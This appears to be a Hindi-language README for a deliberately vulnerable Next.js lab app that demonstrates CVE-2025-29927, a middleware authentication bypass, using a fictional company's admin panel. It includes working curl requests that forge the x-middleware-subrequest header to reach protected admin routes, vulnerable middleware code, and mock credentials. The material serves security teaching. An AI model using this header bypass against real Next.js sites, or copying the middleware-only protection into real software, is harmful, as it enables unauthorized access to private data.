
चेतावनी: यह एप्लिकेशन जानबूझकर असुरक्षित है। यह केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है। इसे किसी सार्वजनिक सर्वर पर तैनात न करें।
यह ऐप CVE-2025-29927 का प्रदर्शन करता है, जो Next.js मिडलवेयर में एक गंभीर प्रमाणीकरण बायपास भेद्यता है (CVSS 9.1)। यह एप्लिकेशन काल्पनिक कंपनी "Himalaya Tech Pvt. Ltd." के लिए एक यथार्थवादी कॉर्पोरेट एडमिन पैनल का अनुकरण करता है — जिससे बायपास का प्रभाव दृश्य रूप से स्पष्ट होता है।
दिखाए गए सभी कर्मचारी रिकॉर्ड, API कुंजियाँ, डेटाबेस क्रेडेंशियल्स और अन्य "संवेदनशील" डेटा पूरी तरह से काल्पनिक और नकली (mock) हैं — केवल शैक्षिक प्रदर्शन के लिए बनाए गए हैं।
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2025-29927 |
| गंभीरता | क्रिटिकल (CVSS 9.1) |
| प्रभावित संस्करण | Next.js ≤ 14.2.29, Next.js ≤ 15.2.2 |
| फिक्स संस्करण | Next.js 14.2.30, 15.2.3 |
| प्रकार | HTTP हेडर हेरफेर के माध्यम से मिडलवेयर प्रमाणीकरण बायपास |
Next.js आंतरिक HTTP हेडर x-middleware-subrequest का उपयोग पुनरावर्ती मिडलवेयर कॉल्स को ट्रैक करने और अनंत लूप को रोकने के लिए करता है। असुरक्षित संस्करणों में, एक हमलावर बाहरी अनुरोध में इस हेडर को जाली बना सकता है। जब हेडर मौजूद होता है और मिडलवेयर के पहचानकर्ता से मेल खाता है, तो Next.js रनटाइम मिडलवेयर को पूरी तरह से स्किप कर देता है, जिसमें उसके भीतर परिभाषित सभी प्रमाणीकरण लॉजिक शामिल हैं।
कोई भी एप्लिकेशन जो रूट्स की सुरक्षा के लिए केवल middleware.ts पर निर्भर करता है (एक सामान्य और अनुशंसित Next.js पैटर्न) असुरक्षित है। एक अनप्रमाणित (unauthenticated) हमलावर केवल एक HTTP हेडर जोड़कर किसी भी सुरक्षित पेज तक पहुँच सकता है।
curl -v http://localhost:3000/admin
# → 307 Redirect to /login
curl -v \
-H "x-middleware-subrequest: middleware" \
http://localhost:3000/admin
# → 200 OK — full admin dashboard HTML returned, no authentication required
# Admin users page
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users
# System settings with "production credentials"
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings
/admin/* के किसी भी अनुरोध में हेडर x-middleware-subrequest: middleware जोड़ें और मिडलवेयर जाँच स्किप हो जाएगी।
middleware.ts एकमात्र सुरक्षा तंत्र है:
// middleware.ts
export function middleware(request: NextRequest) {
if (pathname.startsWith("/admin")) {
const token = request.cookies.get("auth-token")?.value;
if (!token || token !== "valid-session-xyz123") {
return NextResponse.redirect(loginUrl); // ← this entire function is skipped
}
}
return NextResponse.next();
}
पेज कंपोनेंट्स (जैसे app/admin/page.tsx) में कोई प्रमाणीकरण जाँच नहीं है — जानबूझकर, उन वास्तविक-विश्व एप्लिकेशनों को प्रतिबिंबित करने के लिए जो केवल मिडलवेयर-आधारित सुरक्षा पैटर्न का पालन करते हैं।
npm install
npm run dev
ऐप http://localhost:3000 पर उपलब्ध होगा।
*केवल मिडलवेयर द्वारा सुरक्षित — CVE-2025-29927 द्वारा बायपास किया गया।
[email protected]Admin@2024यह एप्लिकेशन केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है, विशेष रूप से नैतिक सुरक्षा पाठ्यक्रम के संदर्भ में CVE-2025-29927 के वास्तविक-विश्व प्रभाव को प्रदर्शित करने के लिए। सभी डेटा (कर्मचारी रिकॉर्ड, API कुंजियाँ, क्रेडेंशियल्स) पूरी तरह से काल्पनिक है। इस डेमो एप्लिकेशन या यहाँ प्रदर्शित तकनीकों का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।
| Route | Auth Required | Description |
|---|
/ | नहीं | सार्वजनिक लैंडिंग पेज |
/login | नहीं | लॉगिन फ़ॉर्म |
/admin | हाँ* | संवेदनशील डेटा वाला एडमिन डैशबोर्ड |
/admin/users | हाँ* | उपयोगकर्ता प्रबंधन |
/admin/settings | हाँ* | सिस्टम सेटिंग्स और क्रेडेंशियल्स |